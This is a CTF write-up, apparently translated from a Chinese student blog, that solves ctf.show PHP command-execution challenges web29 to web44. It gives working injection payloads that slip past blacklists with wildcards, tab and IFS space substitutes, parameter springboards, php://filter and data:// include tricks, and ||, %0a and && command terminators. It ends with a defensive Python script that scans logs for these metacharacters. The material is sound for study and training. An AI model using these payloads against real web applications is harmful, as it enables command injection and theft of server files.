foreword
Late at night, listening to music on Wang Yiyun and feeling emo.
Time to grind challenges for a while, or I won't be able to fall asleep.
红中 (hong_zh0)
CSDN content partner; mentor for the web security track of the 2023 Rising Star Program;
currently the youngest outstanding developer of Huawei MindSpore; captain of the IK&N team;
an ordinary first-year cybersecurity student at Jilin Normal University; won a university-level second prize in the Challenge Cup with a cybersecurity paper;
Alibaba Cloud expert blogger, Huawei Cyber Security Cloud Expert, Tencent Cloud self-media sharing program blogger
Third time through the command execution challenges, I missed them.
web29
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
The first challenge only filters the word "flag" (case-insensitive), which is effectively no filtering at all.
Payload:
?c=system("tac fl??????");//? wildcard
?c=system("tac fl*");//* wildcard
?c=system("tac fl\ag.php");//\ splits the word
?c=system("tac fl''ag.php");//'' splits the word
web30
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
system is banned, so use an alternative.
Payload:
?c=passthru("tac fl\ag.p\hp");
For command execution, the system function can be replaced by:
1. exec()
2. passthru()
3. backticks / shell_exec()
The difference:
system() / passthru()
write the result straight to the browser
exec() / shell_exec() / backticks
only return the result, so it has to be shown with echo/return
web31
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Compared with the previous challenge, more is filtered: cat, sort, shell, the dot, the space and the single quote.
Payload:
?c=passthru("nl%09fl*");//pure bypass
?c=eval($_GET[1]);&1=system("tac flag.php");//works like a springboard
When spaces are banned, substitutes:
${IFS}
<
>
<>
%09
%0a (the main difference between the last two is that %09 is usually inserted in the middle of a command, while %0a is generally placed at the end)
Commands for reading a file:
nl (outputs with line numbers)
cat / tac (cat prints in forward order, tac in reverse)
About the springboard
The page only reads the parameter c. The springboard works by making the value of c read another parameter (here 1), and that second parameter is never checked by the filter.
web32
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
Even more is filtered here (backticks, echo, the semicolon and the parenthesis are gone too), so no function can be called; use include instead.
Payload:
?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
Send it with HackBar; the php://filter pseudo-protocol returns the file as a base64 string.
Decode the base64 to get the flag.
web33-36
Solved with the same method as the previous challenge.
web37
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
A different approach this time: the parameter goes into include().
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
Include through the data:// protocol and pass the PHP code in directly:
<?php system('cat flag.php');?>
Remember to base64-encode it.
web38-web39
Solved with the method above.
web40
I'm a noob and couldn't do this one; read the experts' writeups on ctf.show instead.
web41
I had forgotten how I solved this one by the time I wrote it up
...
I'm a noob (for sure)
web42
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}
Something new appears:
>/dev/null 2>&1
A blog post on >/dev/null 2>&1 is recommended reading.
TL;DR:
it works like a trash can: both standard output and error output are redirected into /dev/null, so nothing comes back.
Payload:
?c=cat flag.php%0a//%0a (newline) terminates the command
?c=cat flag.php||//|| terminates the command
?c=tac flag.php%26%26ls//two commands are passed in, and the trash can only eats one
?c=tac flag.php;//the semicolon terminates the command directly
web43
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
The semicolon (and cat) are banned.
No problem, || still gets around it.
Payload:
?c=tac flag.php||
web44
The environment is no longer up; presumably "flag" is banned on top of the previous challenge's filter.
?c=tac fl*||
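From the defender's side, the space substitutes listed under web31 and the command terminators under web42/43 are exactly what a log check should look for, because a blacklist like web43's /\;|cat/ matches none of them. Below is an added example (my own code, not from this writeup or ctf.show): it URL-decodes the c parameter from constructed access-log lines and reports which of those shell metacharacters are present.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Shell metacharacters the writeup walks through: space substitutes (web31),
# command terminators (web42/43), wildcards used to avoid the word "flag",
# and the $_GET springboard.
INDICATORS = {
    "tab_or_newline":  re.compile(r"[\t\n]"),
    "ifs_variable":    re.compile(r"\$\{?IFS"),
    "redirect":        re.compile(r"[<>]"),
    "separator":       re.compile(r"[|&;]"),
    "wildcard":        re.compile(r"[?*]"),
    "get_springboard": re.compile(r"\$_GET\["),
}

LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')

# Constructed sample log lines (not real traffic): three carry the writeup's
# own payloads, the last is a harmless request with no metacharacters.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /web31/?c=passthru(%22nl%09fl*%22); HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:00:00:02 +0000] "GET /web42/?c=tac%20flag.php%26%26ls HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:00:00:03 +0000] "GET /web43/?c=tac%20flag.php|| HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:00:00:04 +0000] "GET /index.php?c=1 HTTP/1.1" 200 4096
"""

def decoded_c_param(log_line):
    """Return the URL-decoded value of ?c= from one log line, or None."""
    m = LOG_RE.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group("path")).query
    # Split on & before decoding, so an encoded %26%26 stays inside the value
    # (the writeup encodes && for exactly this reason).
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "c":
            return unquote_plus(raw)   # %09 -> tab, %20 -> space, %26 -> &
    return None

def shell_indicators(value):
    """Sorted names of the indicators present in a decoded c value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))

def scan_log(text):
    """Map 1-based line numbers that carry a flagged c parameter to their indicators."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        c = decoded_c_param(line)
        if c is not None and (found := shell_indicators(c)):
            hits[n] = found
    return hits

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(found)}")
```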
Stop writing, Gu Nai